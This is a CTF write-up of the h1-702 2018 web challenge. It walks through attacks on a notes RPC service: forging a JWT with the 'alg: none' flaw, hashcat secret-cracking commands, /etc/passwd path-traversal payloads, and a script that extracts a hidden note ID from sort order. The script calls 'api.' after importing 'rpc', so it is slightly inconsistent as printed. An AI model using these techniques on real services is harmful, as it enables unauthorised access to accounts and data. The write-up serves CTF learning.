h1-702 CTF 2018 Web Challenge Writeup

This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.

Upon navigating to the challenge URL, we're greeted with a message:

Notes RPC Capture The Flag
Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag.
Good luck, you might need it.

Alright, let's see if we can find some other files on the webserver. The two best options from here are checking robots.txt and running a file/directory search using common paths. Since /robots.txt gives a 404 error, we can move on to the next option with dirsearch:

$ python3 dirsearch.py -u http://159.203.178.9/ -e php,html,txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, html, txt | Threads: 10 | Wordlist size: 6657

Target: http://159.203.178.9/

[03:11:32] Starting:
[03:11:33] 403 -  299B  - /.ht_wsr.txt
... <many more 403 errors>
[03:11:38] 200 -  597B  - /index.html
[03:11:40] 200 -   11KB - /README.html
[03:11:40] 415 -   24B  - /rpc.php
...

Task Completed

We've discovered two new files! Let's check out README.html first.

This page details how to interact with an RPC service that's accessible through the other file dirsearch discovered: rpc.php. To summarize, the service allows for the creation, retrieval, and deletion of text snippets ("notes"). In order to make my testing of this service easier, I started by writing a simple Python wrapper for it (later referenced as rpc.py):

import requests

url = "http://159.203.178.9/rpc.php"
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

GET = requests.get
POST = requests.post

def request(r, params=None, json=None):
	headers = {'Authorization': token, 'Accept': 'application/notes.api.v1+json'}
	resp = r(url, params=params, json=json, headers=headers)
	try:
		return resp.json()
	except:
		return resp

def getNotesMetadata():
	return request(GET, params={'method': 'getNotesMetadata'})

def getNote(note_id):
	return request(GET, params={'method': 'getNote', 'id': note_id})

def createNote(note, note_id=None):
	if note_id is None:
		return request(POST, params={'method': 'createNote'}, json={'note': note})
	else:
		return request(POST, params={'method': 'createNote'}, json={'id': note_id, 'note': note})

def resetNotes():
	return request(POST, params={'method':'resetNotes'})

Initial Analysis

After messing around with the service's methods and carefully reading the information provided in the README file, I identified some initial high-potential attack vectors to explore:

Modifying the JWT
Path traversal through note IDs
Server information disclosure through PHP errors

Vector 1: Modifying the JWT

One important note from the README is that the service uses JSON Web Tokens (JWTs) to authenticate users:

Authenticating to the service can be done through the Authorization header. When provided a valid JWT, the service will authenticate the user and allow to query metadata, retrieve a note, create new notes, and delete all notes.

We can view the contents of the token provided in the README by base64 decoding each individual piece, but for its simplicity I like to let jwt.io handle the work:

From this I hypothesized that the payload's id field needs to be changed to another user (likely id=1) who created the note with the flag in it. However, in-place modification of the payload will invalidate the JWT's signature. Given this, there were two possible options apparent to me:

Hope for a broken implementation and attempt the modification anyway
Crack the server's JWT secret so that a valid signature can be created after payload modification

Ignoring the Signature

If ignoring the signature, all that needs to be done to change the payload's id field to 1 is to replace the payload section of the provided JWT with the base64 encoding of {"id":1} (with padding stripped) - eyJpZCI6MX0 - yielding a new token:

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

Unfortunately after changing the token in rpc.py to this new token, all requests failed with an authentication error, indicating that the signature was in fact being checked:

>>> rpc.getNotesMetadata()
{u'authorization': u'is invalid'}

Cracking the Secret

It's possible that the JWT implementation was configured to use a weak user-defined secret instead of random bytes. To test this, we can attempt to crack the secret using password lists and/or full-on bruteforce. Thankfully, hashcat supports cracking JWTs. I attempted cracking with CrackStation's 15GB wordlist as well as up to a 6-character bruteforce, but both routes yielded no matches. I considered continuing the bruteforce with higher character lengths, but decided it was best to explore other vectors first. For anyone curious, the relevant hashcat commands are:

$ hashcat -m 16500 -a 0 <path_to_jwt> <path_to_wordlist> # use wordlist
$ hashcat -m 16500 -a 3 <path_to_jwt> ?a?a?a?a?a?a # 6-character bruteforce

Vector 2: Path Traversal

The README mentions that notes are stored in files instead of a database:

Each note is stored in a secure file that consists of a unique key, the note, and the epoch of when the note was created.

Because of this, path traversal using the note id parameter via getNote could be a plausible vector. This quickly appeared to be a dead-end after trying numerous different traversal payloads, some of which are below:

>>> rpc.getNote('../../../../../../../../etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('../../../../../../../../etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('rpc.php')
{u'note': u'is not found'}
>>> rpc.getNote('../rpc.php')
{u'note': u'is not found'}

Vector 3: Server Information Disclosure

The display_errors configuration setting is enabled by default in PHP, meaning that uncaught errors can be rendered in HTTP responses. Runtime error messages can often reveal sensitive application information, so with this vector I hoped to discover other PHP files that rpc.php might be invoking - potentially widening the attack surface or revealing critical details. Because PHP is a weakly typed language, it's often trivial to throw errors by providing unexpected input types - which in this case would be non-strings. Specific to the Notes RPC service, non-string inputs can be provided through query string array parameters and JSON data types.

Query String Array Parameters

In PHP, query string parameters will be treated as an Array type if a pair of brackets immediately follows the parameter name like so: foo[]=123. By default the example parameter is still accessed by the name "foo", so references to it without validating its type first will likely cause errors. Unfortunately this method did not cause any (visible) errors with the Notes RPC service:

>>> rpc.request(rpc.GET, params={'method[]': 'getNotesMetadata'})
{u'method': u'not found'}
>>> rpc.request(rpc.GET, params={'method': 'getNote', 'id[]':'xyz'})
{u'note': u'is not found'}

JSON Data Types

The JSON specification supports multiple different data types. Using sub-objects ({}) in the JSON arguments to createNote, I was able to trigger internal server errors (code 500) but unfortunately no error output was provided:

>>> rpc.createNote([])
{u'url': u'/rpc.php?method=getNote&id=a5fb2de26211ddcfc5713a6bed0c6328'}
>>> rpc.createNote({})
<Response [500]>
>>> rpc.createNote({}).text
u''
>>> rpc.createNote('asdf', note_id=[])
{u'url': u'/rpc.php?method=getNote&id=Array'}
>>> rpc.createNote('asdf', note_id={})
<Response [500]>
>>> rpc.createNote('asdf', note_id={}).text
u''

Re-evaluating the Target

With none of the initial vectors providing progress, I decided to re-evaluate the service. After considering and briefly attempting other common vulnerabilities such as SQL/Command Injection, it became apparent that there may have been something more evident that I had missed. In my re-evaluation of how the service uses JWTs, I started looking into past vulnerabilities in common PHP JWT libraries. This quickly led me to discover that there was a critical issue found in many libraries back in 2015 - a warning about it still being shown on jwt.io (which I somehow glossed over earlier):

The details of this vulnerability can be found here. A summary of it:

The JWT specification includes a none algorithm (specified in the alg field of the token header)
This algorithm is intended to be used when the integrity of a token has already been verified
Vulnerable implementations treated tokens signed with the none algorithm as valid regardless of their signature
This can be exploited by simply changing the alg field of the header to none and modifying the payload section to include any desired data

Attempting the Exploit

Using the modified token created earlier (in "Ignoring the Signature"), we simply need to change the header from:

{"typ":"JWT","alg":"HS256"}

to:

{"typ":"JWT","alg":"none"}

Like the modified payload, the new header just needs to be base64 encoded. Replacing the token header with this modified version gives the new token:

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

With the token now changed in rpc.py, let's try calling getNotesMetadata:

>>> rpc.getNotesMetadata()
{u'count': 1, u'epochs': [u'1528911533']}

Success! We now have the epoch of what's likely the flag note. But wait, notes are accessed by id not epoch... Guess we're not done yet.

Re-evaluating the Target (Again)

Now armed with the target note's epoch, I decided that I probably needed to find a way to extract its id based on the epoch value. Per the README, note IDs are randomly generated unless one is provided when calling createNote:

An optional ID. If not provided, it'll generate a 16 byte random string.

Noting that, I decided the two best approaches moving forward were:

Looking into attacking the PRNG that generates note IDs
Revisiting the recon stage to see if anything was missed

Attacking the PRNG

If the PRNG that generates note IDs was reversed, we in theory could recover the generated ID associated with the target note's epoch. Generally, attacking PRNGs involves a lot of guessing unless the target application is open-source. In the case of the Notes RPC service, we could hypothesize that PHP's mt_rand or rand functions are being used - both of which are known to be cryptographically insecure. However, attacks against these functions would be difficult to perform due to the generated numbers being bounded as well as not knowing how the charset is assembled. Given that, I decided to move on to something else so as not to waste too much time with guessing.

Revisiting Recon

In the initial recon stage I had neglected to check the HTML source of the files discovered on the server. Low and behold, a very helpful HTML comment can be found in the source of README.html:

<!--
    Version 2 is in the making and being tested right now, it includes an optimized file format that
    sorts the notes based on their unique key before saving them. This allows them to be queried faster.
    Please do NOT use this in production yet!
-->

Jackpot! This gives us two new pieces of information:

There's a version 2 API
The next attack vector will probably involve version 2's sorting feature - getNotesMetadata being a primary candidate for that

The Final Attack

The README file details the necessity of an Accept header that specifies the API version being used:

Accept: application/notes.api.v1+json

So to access the version 2 API, we likely just need to change v1 to v2, like so:

Accept: application/notes.api.v2+json

After changing this in rpc.py and creating a few test notes, the theorized change to getNotesMetadata is validated as note epochs now seem to be sorted based on the lexicographical ordering of note ID strings - not numerically by epoch as they were in version 1:

>>> rpc.createNote('asdf', note_id='C')
{u'url': u'/rpc.php?method=getNote&id=C'}
>>> rpc.createNote('asdf', note_id='A')
{u'url': u'/rpc.php?method=getNote&id=A'}
>>> rpc.createNote('asdf', note_id='B')
{u'url': u'/rpc.php?method=getNote&id=B'}
>>> rpc.getNotesMetadata()
{u'count': 4, u'epochs': [u'1529727460', u'1529727462', u'1529727456', u'1528911533']}

With this new sorting method we can perform a character-by-character bruteforce to extract the flag note's ID based on where a new note with a crafted ID appears in the list of note epochs generated by getNotesMetadata.

Example

In case my explanation of the issue was a bit confusing, let's consider a theoretical note with an id of Y:

>>> sorted(['X', 'Y'])
['X', 'Y']
>>> sorted(['Z', 'Y'])
['Y', 'Z']

When a note with an ID of X is created, it will appear before Y in the sorted-by-ID list of epochs. If a note with an ID of Z is created, it will appear after Y in the list of epochs. Once this pivot occurs, we're able to determine that the unknown character must be between X and Z (exclusive), narrowing it down to Y in this case. That pivot search can be continued on a character-by-character basis until the full ID is extracted.

Executing the Attack

I wrote a Python script to automate the extraction process (later referenced as attack.py):

import rpc

charset = sorted("0123456789abcdef")
target = "1528911533" # target note's epoch

key = ['?'] * 16 # key should be 16 characters
pos = 0
while pos < len(key):
	found = False
	for i in range(len(charset)):
		# create key attempt using known values + current brute char
		tmp_key = key[:]
		tmp_key[pos] = charset[i]
		tmp_key_str = ''.join(tmp_key).replace('?', charset[0])
		
		# create note with id of key attempt to compare against unknown key 
		api.resetNotes()
		api.createNote('asdf', note_id=tmp_key_str)
		tmp_epoch = api.getNote(tmp_key_str)['epoch']
        
		# use new note's epoch index to detect if next char has been found
		if api.getNotesMetadata()['epochs'][1] == tmp_epoch:
			key[pos] = charset[i - 1]
			pos += 1
			found = True
			print(''.join(key).replace('?', ''))
			break
	if not found:
		print('failed to get next char')
		break

Oddly, the script failed when I tried to run it:

$ python attack.py
0
failed to get next char

After investigating and attempting to find out why, I recalled an important piece of info from the README:

400	| Returned when the ID does not match /\A[a-zA-Z0-9]+\z/.

Although the randomly generated note IDs only contained hex characters, note IDs can contain any characters in the a-zA-Z0-9 charset. After implementing this change in attack.py:

import string
charset = sorted(string.ascii_letters + string.digits)

The script still failed with the same result as before. I theorized that the comparisons may be failing due to the target id being longer than the randomly generated IDs (16 characters). After changing the key length in attack.py to an arbitrarily larger number:

key = ['?'] * 128

The script finally started working!

E
Ee
Eel
...
EelHIXsuAw4FXCa9ep
EelHIXsuAw4FXCa9epe
EelHIXsuAw4FXCa9eped
failed to get next char

Sweet! Let's try to get that note now:

>>> rpc.getNote('EelHIXsuAw4FXCa9eped')
{u'note': u'is not found'}

WHAT?!?! After ~~wanting to tear my hair out and~~ taking another look at the script, it occurred to me that the comparison would fail on the last character because I didn't account for the final case where the two strings would be equal. To counter this, the value of the last character needs to be incremented (d -> e):

>>> rpc.getNote('EelHIXsuAw4FXCa9epee')
{u'note': u'NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==', u'epoch': u'1528911533'}

base64 decode that:

>>> base64.b64decode('NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==')
'702-CTF-FLAG: NP26nDOI6H5ASemAOW6g'

We got the flag!

Conclusion

Thank you to HackerOne for hosting this fun and original challenge!

Valid Steps TL;DR

Find the README detailing the Notes RPC service
Exploit a JWT library flaw to change the provided JWT's user id to 1
See that the epoch of the flag note can now be accessed
Find the HTML comment in the README mentioning API version 2 and its sorting functionality
Exploit the sorting in version 2's getNotesMetadata method - extract unknown flag note's id based on string ordering

Additional Info

The final version of rpc.py can be found here.

The final version of attack.py can be found here.

As a side note, I'd like to mention that the key extraction could be made much more efficient by implementing a binary search algorithm. However, because the search space is relatively small, the added efficiency isn't really necessary so I opted to not implement it for the sake of simplicity.

Questions or Feedback?

Contact me on Twitter: @jsploit

JMdoubleU/writeup.md